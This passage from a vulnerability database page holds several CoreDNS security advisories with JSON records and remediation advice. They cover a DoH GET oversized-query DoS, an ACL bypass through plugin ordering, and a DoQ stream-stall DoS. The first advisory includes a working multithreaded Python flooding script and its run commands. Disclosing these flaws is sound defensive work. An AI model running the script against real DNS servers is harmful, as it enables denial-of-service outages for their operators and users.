By contrast, the POST path applies a bounded read before unpacking:
```go
func toMsg(r io.ReadCloser) (*dns.Msg, error) {
buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536))
if err != nil {
return nil, err
}
m := new(dns.Msg)
err = m.Unpack(buf)
return m, err
}
So, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs.
In addition, the HTTPS server is created in core/dnsserver/server_https.go:87-92 without an explicit early GET-path size guard in this path:
srv := &http.Server{
ReadTimeout: s.ReadTimeout,
WriteTimeout: s.WriteTimeout,
IdleTimeout: s.IdleTimeout,
ErrorLog: stdlog.New(&loggerAdapter{}, "", 0),
}
As a result, oversized DoH GET request targets are processed through:
- HTTP request-line parsing
- URL query parsing / unescaping
- DoH GET extraction
- base64 decoding
- DNS message unpacking
before the request is rejected.
Root cause
The root cause is missing early size validation on the DoH GET path.
More specifically:
requestToMsgGet()performsreq.URL.Query()on attacker-controlled oversized request targets.- The extracted
dnsvalue is passed tobase64ToMsg()without an encoded-length or decoded-length bound. base64ToMsg()fully decodes the attacker-controlled string before any DNS-size rejection.- The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound.
This creates a pre-validation resource-amplification path for DoH GET.
PoC
Local test setup
I reproduced this locally against CoreDNS 1.14.2 over HTTPS with pprof enabled.
Create a self-signed certificate:
openssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \
-keyout key.pem -out cert.pem \
-subj "/CN=127.0.0.1"
Create this Corefile:
https://127.0.0.1:8443 {
whoami
log
errors
tls cert.pem key.pem
pprof 127.0.0.1:6060
}
Run CoreDNS:
./coredns -conf Corefile
Proof-of-concept script
#!/usr/bin/env python3
import argparse
import base64
import collections
import concurrent.futures
import http.client
import ssl
import time
def send_one(host, port, path, timeout):
ctx = ssl._create_unverified_context()
conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
try:
conn.request("GET", path, headers={
"Accept": "application/dns-message",
"Connection": "close",
})
resp = conn.getresponse()
resp.read()
return resp.status
except Exception as e:
return f"ERR:{type(e).__name__}"
finally:
try:
conn.close()
except Exception:
pass
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--host", default="127.0.0.1")
ap.add_argument("--port", type=int, default=8443)
ap.add_argument("--decoded-kib", type=int, default=720)
ap.add_argument("--workers", type=int, default=64)
ap.add_argument("--requests", type=int, default=5000)
ap.add_argument("--timeout", type=float, default=5.0)
args = ap.parse_args()
raw = b"A" * (args.decoded_kib * 1024)
b64 = base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
path = "/dns-query?dns=" + b64
print(f"[+] target = https://{args.host}:{args.port}")
print(f"[+] decoded bytes = {len(raw):,}")
print(f"[+] encoded chars = {len(b64):,}")
print(f"[+] request-target length = {len(path):,}")
print(f"[+] workers = {args.workers}, requests = {args.requests}")
print("[+] 400 responses are expected; the issue is expensive processing before rejection.\n")
started = time.time()
results = collections.Counter()
with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex:
futs = [
ex.submit(send_one, args.host, args.port, path, args.timeout)
for _ in range(args.requests)
]
for i, fut in enumerate(concurrent.futures.as_completed(futs), 1):
results[fut.result()] += 1
if i % 10 == 0 or i == args.requests:
print(f"[{i}/{args.requests}] {dict(results)}")
elapsed = time.time() - started
print("\n[+] done")
print(f"[+] elapsed = {elapsed:.2f}s")
print(f"[+] summary = {dict(results)}")
if __name__ == "__main__":
main()
Run the PoC:
python3 poc_doh_get_oversize_https.py \
--host 127.0.0.1 \
--port 8443 \
--decoded-kib 720 \
--workers 64 \
--requests 5000
Profiling commands used during reproduction
CPU profile:
(curl -s "http://127.0.0.1:6060/debug/pprof/profile?seconds=20" -o cpu_attack.pb.gz &) ; \
sleep 1 ; \
python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \
wait
go tool pprof -top ./coredns cpu_attack.pb.gz
Heap / allocation profiles:
curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz
curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz
python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000
curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz
curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz
go tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz
go tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz
Reproduction results
I confirmed the issue on:
- CoreDNS 1.14.2
- linux/amd64
- go1.26.1
PoC payload characteristics:
- decoded payload size:
737,280 bytes - base64url-encoded
dnslength:983,040 - request-target length:
983,055
Observed request outcome:
5000 / 5000requests returned400 Bad Request- total runtime for the 5000-request run:
18.22s
The important point is that the requests are rejected only after expensive processing has already happened.
CPU profile highlights
The CPU profile captured during the attack showed significant time in:
net/http.readRequestnet/url.ParseQuery/net/url.QueryUnescape/net/url.unescapegithub.com/coredns/coredns/plugin/pkg/doh.requestToMsgGetgithub.com/coredns/coredns/plugin/pkg/doh.base64ToMsgencoding/base64.(*Encoding).DecodeString- Go GC worker paths
Representative cumulative values from the captured profile included:
github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP→10.91sgithub.com/coredns/coredns/plugin/pkg/doh.RequestToMsg→10.88sgithub.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet→10.88sgithub.com/coredns/coredns/plugin/pkg/doh.base64ToMsg→3.50sencoding/base64.(*Encoding).DecodeString→3.46snet/http.readRequest→10.57snet/url.(*URL).Query/ParseQuery/QueryUnescape→7.38sruntime.gcBgMarkWorkerand related GC paths were also heavily active
This demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection.
Allocation profile highlights
Allocation profiling showed very large transient allocation volume caused by the rejected requests:
- total
alloc_space:26,756.48 MB
Top contributors included:
net/textproto.(*Reader).readLineSlice→19,668.19 MBnet/textproto.(*Reader).ReadLine→3,738.84 MBencoding/base64.(*Encoding).DecodeString→2,766.16 MB
Within the CoreDNS DoH GET path specifically:
github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg→2,775.67 MBgithub.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet→2,775.67 MBgithub.com/coredns/coredns/plugin/pkg/doh.base64ToMsg→2,773.67 MB
Heap delta (inuse_space) also showed live growth attributable to this path, including:
encoding/base64.(*Encoding).DecodeString→7,629.75 kB
Memory observations
Runtime memory monitoring showed a clear increase in peak resident usage during the attack:
- baseline
VmHWM / VmRSSbefore load was approximately55,864 kB - observed
VmHWMduring testing reached approximately146,100 kB
So even though requests returned 400, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection.
Impact
A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work.
Impact includes:
- elevated CPU consumption
- large transient allocations
- increased garbage-collection pressure
- higher peak resident memory usage
- degraded throughput and responsiveness
- denial of service risk on memory-constrained or heavily loaded deployments
This is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication.
The fact that the final HTTP status is 400 Bad Request does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated.
Suggested remediation
A robust fix should address both stages of the problem:
- Apply an early bound on the DoH GET request target / raw query length before expensive query parsing.
- Enforce an encoded-length and decoded-length limit for the
dnsparameter before callingDecodeString(). - Preserve equivalent size constraints across GET and POST paths.
A minimal hardening direction would be:
- reject oversized GET requests before
req.URL.Query()on the DoH path - reject
dnsvalues whose encoded length exceeds the maximum valid DNS message encoding - reject any decoded payload larger than the supported DNS message size before unpacking
Credit request: When referencing, republishing, or issuing downstream advisories for this vulnerability, please preserve the original researcher credit as Ali Firas (thesmartshadow).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32936"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-28T22:43:47Z",
"nvd_published_at": "2026-05-05T20:16:36Z",
"severity": "HIGH"
},
"details": "### Summary\n\nCoreDNS\u0027s DNS-over-HTTPS (DoH) GET path accepts oversized `dns=` query values and performs substantial request parsing, query unescaping, base64 decoding, and message unpacking work before returning `400 Bad Request`.\n\nA remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to `/dns-query?dns=...` and force high CPU usage, large transient allocations, elevated garbage-collection pressure, and increased resident memory consumption even though the requests are ultimately rejected.\n\nThis is a denial-of-service issue caused by expensive pre-validation processing on the DoH GET path.\n\n### Details\n\nThe vulnerable flow is in `plugin/pkg/doh/doh.go`:\n\n- `RequestToMsg()` dispatches GET requests to `requestToMsgGet()`:\n - `plugin/pkg/doh/doh.go:79-89`\n- `requestToMsgGet()` calls `req.URL.Query()`, extracts `dns`, and passes it directly to `base64ToMsg()`:\n - `plugin/pkg/doh/doh.go:99-108`\n- `base64ToMsg()` decodes the full attacker-controlled value via `b64Enc.DecodeString()` and only then attempts to unpack it into a DNS message:\n - `plugin/pkg/doh/doh.go:121-130`\n\nRelevant snippet:\n\n```go\nfunc requestToMsgGet(req *http.Request) (*dns.Msg, error) {\n values := req.URL.Query()\n b64, ok := values[\"dns\"]\n if !ok {\n return nil, fmt.Errorf(\"no \u0027dns\u0027 query parameter found\")\n }\n if len(b64) != 1 {\n return nil, fmt.Errorf(\"multiple \u0027dns\u0027 query values found\")\n }\n return base64ToMsg(b64[0])\n}\n\nfunc base64ToMsg(b64 string) (*dns.Msg, error) {\n buf, err := b64Enc.DecodeString(b64)\n if err != nil {\n return nil, err\n }\n\n m := new(dns.Msg)\n err = m.Unpack(buf)\n\n return m, err\n}\n````\n\nBy contrast, the POST path applies a bounded read before unpacking:\n\n```go\nfunc toMsg(r io.ReadCloser) (*dns.Msg, error) {\n buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536))\n if err != nil {\n return nil, err\n }\n m := new(dns.Msg)\n err = m.Unpack(buf)\n return m, err\n}\n```\n\nSo, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs.\n\nIn addition, the HTTPS server is created in `core/dnsserver/server_https.go:87-92` without an explicit early GET-path size guard in this path:\n\n```go\nsrv := \u0026http.Server{\n ReadTimeout: s.ReadTimeout,\n WriteTimeout: s.WriteTimeout,\n IdleTimeout: s.IdleTimeout,\n ErrorLog: stdlog.New(\u0026loggerAdapter{}, \"\", 0),\n}\n```\n\nAs a result, oversized DoH GET request targets are processed through:\n\n1. HTTP request-line parsing\n2. URL query parsing / unescaping\n3. DoH GET extraction\n4. base64 decoding\n5. DNS message unpacking\n\nbefore the request is rejected.\n\n### Root cause\n\nThe root cause is missing early size validation on the DoH GET path.\n\nMore specifically:\n\n* `requestToMsgGet()` performs `req.URL.Query()` on attacker-controlled oversized request targets.\n* The extracted `dns` value is passed to `base64ToMsg()` without an encoded-length or decoded-length bound.\n* `base64ToMsg()` fully decodes the attacker-controlled string before any DNS-size rejection.\n* The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound.\n\nThis creates a pre-validation resource-amplification path for DoH GET.\n\n### PoC\n\n#### Local test setup\n\nI reproduced this locally against CoreDNS 1.14.2 over HTTPS with `pprof` enabled.\n\nCreate a self-signed certificate:\n\n```bash\nopenssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \\\n -keyout key.pem -out cert.pem \\\n -subj \"/CN=127.0.0.1\"\n```\n\nCreate this `Corefile`:\n\n```txt\nhttps://127.0.0.1:8443 {\n whoami\n log\n errors\n tls cert.pem key.pem\n pprof 127.0.0.1:6060\n}\n```\n\nRun CoreDNS:\n\n```bash\n./coredns -conf Corefile\n```\n\n#### Proof-of-concept script\n\n```python\n#!/usr/bin/env python3\nimport argparse\nimport base64\nimport collections\nimport concurrent.futures\nimport http.client\nimport ssl\nimport time\n\ndef send_one(host, port, path, timeout):\n ctx = ssl._create_unverified_context()\n conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)\n try:\n conn.request(\"GET\", path, headers={\n \"Accept\": \"application/dns-message\",\n \"Connection\": \"close\",\n })\n resp = conn.getresponse()\n resp.read()\n return resp.status\n except Exception as e:\n return f\"ERR:{type(e).__name__}\"\n finally:\n try:\n conn.close()\n except Exception:\n pass\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--host\", default=\"127.0.0.1\")\n ap.add_argument(\"--port\", type=int, default=8443)\n ap.add_argument(\"--decoded-kib\", type=int, default=720)\n ap.add_argument(\"--workers\", type=int, default=64)\n ap.add_argument(\"--requests\", type=int, default=5000)\n ap.add_argument(\"--timeout\", type=float, default=5.0)\n args = ap.parse_args()\n\n raw = b\"A\" * (args.decoded_kib * 1024)\n b64 = base64.urlsafe_b64encode(raw).rstrip(b\"=\").decode()\n path = \"/dns-query?dns=\" + b64\n\n print(f\"[+] target = https://{args.host}:{args.port}\")\n print(f\"[+] decoded bytes = {len(raw):,}\")\n print(f\"[+] encoded chars = {len(b64):,}\")\n print(f\"[+] request-target length = {len(path):,}\")\n print(f\"[+] workers = {args.workers}, requests = {args.requests}\")\n print(\"[+] 400 responses are expected; the issue is expensive processing before rejection.\\n\")\n\n started = time.time()\n results = collections.Counter()\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex:\n futs = [\n ex.submit(send_one, args.host, args.port, path, args.timeout)\n for _ in range(args.requests)\n ]\n for i, fut in enumerate(concurrent.futures.as_completed(futs), 1):\n results[fut.result()] += 1\n if i % 10 == 0 or i == args.requests:\n print(f\"[{i}/{args.requests}] {dict(results)}\")\n\n elapsed = time.time() - started\n print(\"\\n[+] done\")\n print(f\"[+] elapsed = {elapsed:.2f}s\")\n print(f\"[+] summary = {dict(results)}\")\n\nif __name__ == \"__main__\":\n main()\n```\n\nRun the PoC:\n\n```bash\npython3 poc_doh_get_oversize_https.py \\\n --host 127.0.0.1 \\\n --port 8443 \\\n --decoded-kib 720 \\\n --workers 64 \\\n --requests 5000\n```\n\n#### Profiling commands used during reproduction\n\nCPU profile:\n\n```bash\n(curl -s \"http://127.0.0.1:6060/debug/pprof/profile?seconds=20\" -o cpu_attack.pb.gz \u0026) ; \\\nsleep 1 ; \\\npython3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \\\nwait\n\ngo tool pprof -top ./coredns cpu_attack.pb.gz\n```\n\nHeap / allocation profiles:\n\n```bash\ncurl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz\ncurl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz\n\npython3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000\n\ncurl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz\ncurl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz\n\ngo tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz\ngo tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz\n```\n\n### Reproduction results\n\nI confirmed the issue on:\n\n* CoreDNS 1.14.2\n* linux/amd64\n* go1.26.1\n\nPoC payload characteristics:\n\n* decoded payload size: `737,280 bytes`\n* base64url-encoded `dns` length: `983,040`\n* request-target length: `983,055`\n\nObserved request outcome:\n\n* `5000 / 5000` requests returned `400 Bad Request`\n* total runtime for the 5000-request run: `18.22s`\n\nThe important point is that the requests are rejected only after expensive processing has already happened.\n\n#### CPU profile highlights\n\nThe CPU profile captured during the attack showed significant time in:\n\n* `net/http.readRequest`\n* `net/url.ParseQuery` / `net/url.QueryUnescape` / `net/url.unescape`\n* `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet`\n* `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg`\n* `encoding/base64.(*Encoding).DecodeString`\n* Go GC worker paths\n\nRepresentative cumulative values from the captured profile included:\n\n* `github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP` \u2192 `10.91s`\n* `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` \u2192 `10.88s`\n* `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` \u2192 `10.88s`\n* `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` \u2192 `3.50s`\n* `encoding/base64.(*Encoding).DecodeString` \u2192 `3.46s`\n* `net/http.readRequest` \u2192 `10.57s`\n* `net/url.(*URL).Query` / `ParseQuery` / `QueryUnescape` \u2192 `7.38s`\n* `runtime.gcBgMarkWorker` and related GC paths were also heavily active\n\nThis demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection.\n\n#### Allocation profile highlights\n\nAllocation profiling showed very large transient allocation volume caused by the rejected requests:\n\n* total `alloc_space`: `26,756.48 MB`\n\nTop contributors included:\n\n* `net/textproto.(*Reader).readLineSlice` \u2192 `19,668.19 MB`\n* `net/textproto.(*Reader).ReadLine` \u2192 `3,738.84 MB`\n* `encoding/base64.(*Encoding).DecodeString` \u2192 `2,766.16 MB`\n\nWithin the CoreDNS DoH GET path specifically:\n\n* `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` \u2192 `2,775.67 MB`\n* `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` \u2192 `2,775.67 MB`\n* `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` \u2192 `2,773.67 MB`\n\nHeap delta (`inuse_space`) also showed live growth attributable to this path, including:\n\n* `encoding/base64.(*Encoding).DecodeString` \u2192 `7,629.75 kB`\n\n#### Memory observations\n\nRuntime memory monitoring showed a clear increase in peak resident usage during the attack:\n\n* baseline `VmHWM / VmRSS` before load was approximately `55,864 kB`\n* observed `VmHWM` during testing reached approximately `146,100 kB`\n\nSo even though requests returned `400`, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection.\n\n### Impact\n\nA remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work.\n\nImpact includes:\n\n* elevated CPU consumption\n* large transient allocations\n* increased garbage-collection pressure\n* higher peak resident memory usage\n* degraded throughput and responsiveness\n* denial of service risk on memory-constrained or heavily loaded deployments\n\nThis is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication.\n\nThe fact that the final HTTP status is `400 Bad Request` does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated.\n\n### Suggested remediation\n\nA robust fix should address both stages of the problem:\n\n1. Apply an early bound on the DoH GET request target / raw query length before expensive query parsing.\n2. Enforce an encoded-length and decoded-length limit for the `dns` parameter before calling `DecodeString()`.\n3. Preserve equivalent size constraints across GET and POST paths.\n\nA minimal hardening direction would be:\n\n* reject oversized GET requests before `req.URL.Query()` on the DoH path\n* reject `dns` values whose encoded length exceeds the maximum valid DNS message encoding\n* reject any decoded payload larger than the supported DNS message size before unpacking\n\n---\n\n**Credit request: When referencing, republishing, or issuing downstream advisories for this vulnerability, please preserve the original researcher credit as Ali Firas (thesmartshadow).**",
"id": "GHSA-63cw-r7xf-jmwr",
"modified": "2026-06-12T19:25:56Z",
"published": "2026-04-28T22:43:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32936"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CoreDNS DoH GET oversized dns= query parameter causes pre-validation CPU and memory amplification"
}
GHSA-C9V3-4PV7-87PR
Vulnerability from github – Published: 2026-03-06 18:04 – Updated: 2026-04-27 13:53A logical vulnerability in CoreDNS allows DNS access controls to be bypassed due to the default execution order of plugins. Security plugins such as acl are evaluated before the rewrite plugin, resulting in a Time-of-Check Time-of-Use (TOCTOU) flaw.
Impact
In multi-tenant Kubernetes clusters, this flaw undermines DNS-based segmentation strategies.
Example scenario: 1. ACL blocks access to *.admin.svc.cluster.local 2. A rewrite rule maps public-name → admin.svc.cluster.local 3. An unprivileged pod queries public-name 4. ACL allows the request 5. Rewrite exposes the internal admin service IP
This allows unauthorized service discovery and reconnaissance of restricted internal infrastructure.
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
- Reorder the default plugin.cfg so that:
- rewrite and other normalization plugins run before acl, opa, and firewall
- Ensure all access control checks are applied after name normalization.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26017"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-06T18:04:00Z",
"nvd_published_at": "2026-03-06T16:16:10Z",
"severity": "HIGH"
},
"details": "A logical vulnerability in CoreDNS allows DNS access controls to be bypassed due to the default execution order of plugins. Security plugins such as acl are evaluated before the rewrite plugin, resulting in a Time-of-Check Time-of-Use (TOCTOU) flaw.\n\n\n### Impact\n\nIn multi-tenant Kubernetes clusters, this flaw undermines DNS-based segmentation strategies.\n\nExample scenario:\n1. ACL blocks access to *.admin.svc.cluster.local\n2. A rewrite rule maps public-name \u2192 admin.svc.cluster.local\n3. An unprivileged pod queries public-name\n4. ACL allows the request\n5. Rewrite exposes the internal admin service IP\n\nThis allows unauthorized service discovery and reconnaissance of restricted internal infrastructure.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n\n- Reorder the default plugin.cfg so that:\n - rewrite and other normalization plugins run before acl, opa, and firewall\n- Ensure all access control checks are applied after name normalization.",
"id": "GHSA-c9v3-4pv7-87pr",
"modified": "2026-04-27T13:53:21Z",
"published": "2026-03-06T18:04:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-c9v3-4pv7-87pr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26017"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS ACL Bypass"
}
GHSA-2WPX-QPW2-G5H5
Vulnerability from github – Published: 2026-04-28 22:40 – Updated: 2026-05-08 15:27Summary
CoreDNS' DNS-over-QUIC (DoQ) server can be driven into large goroutine and memory growth by a remote client that opens many QUIC streams and stalls after sending only 1 byte. Even with a small configured quic { worker_pool_size ... }, CoreDNS still spawns a goroutine per accepted stream (workers + waiters) and active workers can block indefinitely in io.ReadFull() with no per-stream read deadline, enabling unauthenticated remote DoS via memory exhaustion/OOM-kill.
Details
CoreDNS' DoQ server uses a global worker pool (streamProcessPool) to limit concurrent stream processing, but when the pool is full it still spawns a goroutine per accepted stream that waits to acquire a worker token: select { case s.streamProcessPool <- ...: go ...; default: go ... wait for token ... } (core/dnsserver/server_quic.go)
Additionally, the DoQ message framing reads are blocking io.ReadFull() calls with no per-stream read deadline: readDOQMessage() reads the 2-byte length prefix and message body via io.ReadFull() (core/dnsserver/server_quic.go)
This allows an attacker to pin all workers by sending 1 byte (so io.ReadFull() blocks waiting for the second byte of the DoQ length prefix), while also creating an unbounded backlog of goroutines waiting for a worker token.
Note: this appears to be a result of an incomplete fix/regression for CVE-2025-47950 (GHSA-cvx7-x8pj-x2gw).
PoC
- Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well)
- Run python3 ./doq-dos-repro.py
- Expected sample output: *** Start CoreDNS *** Corefile: /tmp/vh-f003-doq-mem-regression/Corefile Log: /tmp/vh-f003-doq-mem-regression/coredns.log
*** Baseline sample (idle) *** rss_kib=49380 go_goroutines=17
*** Build + run partial-stream flooder *** go: downloading golang.org/x/net v0.43.0 go: downloading golang.org/x/crypto v0.41.0 go: downloading go.uber.org/mock v0.5.2 go: downloading github.com/stretchr/testify v1.11.1 go: downloading golang.org/x/sys v0.35.0 go: downloading github.com/pmezard/go-difflib v1.0.0 go: downloading github.com/davecgh/go-spew v1.1.1 go: downloading gopkg.in/yaml.v3 v3.0.1
*** Candidate sample (during attack) *** rss_kib=137968 go_goroutines=15557
*** Flooder output *** opened conns=60 streams_per_conn=256 total_streams=15360
*** Wrote results *** /tmp/vh-f003-doq-mem-regression/results.json
*** OK *** DoQ flood caused goroutine/RSS growth despite worker_pool_size.
Impact
Unauthenticated remote DoS on an encrypted DNS transport via goroutine/RSS growth leading to OOM-kill/crash and service outage.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32934"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-28T22:40:38Z",
"nvd_published_at": "2026-05-05T20:16:35Z",
"severity": "HIGH"
},
"details": "### Summary\nCoreDNS\u0027 DNS-over-QUIC (DoQ) server can be driven into large goroutine and memory growth by a remote client that opens many QUIC streams and stalls after sending only 1 byte. Even with a small configured quic { worker_pool_size ... }, CoreDNS still spawns a goroutine per accepted stream (workers + waiters) and active workers can block indefinitely in io.ReadFull() with no per-stream read deadline, enabling unauthenticated remote DoS via memory exhaustion/OOM-kill.\n\n### Details\nCoreDNS\u0027 DoQ server uses a global worker pool (streamProcessPool) to limit concurrent stream processing, but when the pool is full it still spawns a goroutine per accepted stream that waits to acquire a worker token: select { case s.streamProcessPool \u003c- ...: go ...; default: go ... wait for token ... } (core/dnsserver/server_quic.go)\n\nAdditionally, the DoQ message framing reads are blocking io.ReadFull() calls with no per-stream read deadline: readDOQMessage() reads the 2-byte length prefix and message body via io.ReadFull() (core/dnsserver/server_quic.go)\n\nThis allows an attacker to pin all workers by sending 1 byte (so io.ReadFull() blocks waiting for the second byte of the DoQ length prefix), while also creating an unbounded backlog of goroutines waiting for a worker token.\n\nNote: this appears to be a result of an incomplete fix/regression for CVE-2025-47950 (GHSA-cvx7-x8pj-x2gw).\n\n### PoC\n1. Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well)\n2. Run python3 ./doq-dos-repro.py\n3. Expected sample output:\n*** Start CoreDNS ***\nCorefile: /tmp/vh-f003-doq-mem-regression/Corefile\nLog: /tmp/vh-f003-doq-mem-regression/coredns.log\n\n*** Baseline sample (idle) ***\nrss_kib=49380 go_goroutines=17\n\n*** Build + run partial-stream flooder ***\ngo: downloading golang.org/x/net v0.43.0\ngo: downloading golang.org/x/crypto v0.41.0\ngo: downloading go.uber.org/mock v0.5.2\ngo: downloading github.com/stretchr/testify v1.11.1\ngo: downloading golang.org/x/sys v0.35.0\ngo: downloading github.com/pmezard/go-difflib v1.0.0\ngo: downloading github.com/davecgh/go-spew v1.1.1\ngo: downloading gopkg.in/yaml.v3 v3.0.1\n\n*** Candidate sample (during attack) ***\nrss_kib=137968 go_goroutines=15557\n\n*** Flooder output ***\nopened conns=60 streams_per_conn=256 total_streams=15360\n\n*** Wrote results ***\n/tmp/vh-f003-doq-mem-regression/results.json\n\n*** OK ***\nDoQ flood caused goroutine/RSS growth despite worker_pool_size.\n\n\n### Impact\nUnauthenticated remote DoS on an encrypted DNS transport via goroutine/RSS growth leading to OOM-kill/crash and service outage.",
"id": "GHSA-2wpx-qpw2-g5h5",
"modified": "2026-05-08T15:27:59Z",
"published": "2026-04-28T22:40:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-2wpx-qpw2-g5h5"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-cvx7-x8pj-x2gw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32934"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CoreDNS\u0027 DoQ worker pool does not bound stream backlog"
}
GHSA-H75P-J8XM-M278
Vulnerability from github – Published: 2026-03-06 22:08 – Updated: 2026-03-06 22:08Executive Summary
